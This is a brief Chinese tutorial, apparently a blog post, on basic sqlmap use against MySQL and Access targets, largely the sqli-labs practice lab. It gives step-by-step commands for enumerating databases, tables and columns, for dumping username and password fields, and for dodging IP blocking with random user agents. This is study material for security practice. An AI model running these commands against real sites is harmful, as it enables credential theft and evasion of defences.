sqlmap基本使用

Mysql数据库
1、先检测是否可以注入,先判断是否可以正常注入:
sqlmap -u url -v 3
里面有个注意的点url后面必须是可注入的参数?id=之类的,否则url检测会有问题
对于某些今天url可以在/a/b.html尝试加入号来进行此路径内的检测
2、爆库
【sqlmap基本使用】sqlmap.py -u http://sqli-labs-master/Less-... -v 3 --dbs --batch
3、根据爆出来的库查表
sqlmap.py -u http://sqli-labs-master/Less-... -v 3 -D "security" --tables --batch
4、根据表查字段
sqlmap.py -u http://sqli-labs-master/Less-... -v 3 -D "security" -T "users" --columns --batch
5、根据字段查值
sqlmap.py -u http://sqli-labs-master/Less-... -v 3 -D "security" -T "users" -C "username,password" --dump --batch
防止被IP拦截的操作,random-agent让请求头随机:
可以在后面增加--proxy http://127.0.0.1:8080 --random-agent -v 3
Access
对于Access数据库,直接报表就OK
sqlmap -u "http://192.168.96.16/shownews.asp?id=23" --tables
sqlmap里面的字典位置,内置字典位置为,可以根据自己的需要更改,对于Access一般就是直接暴库
sqlmap\data\txt

    推荐阅读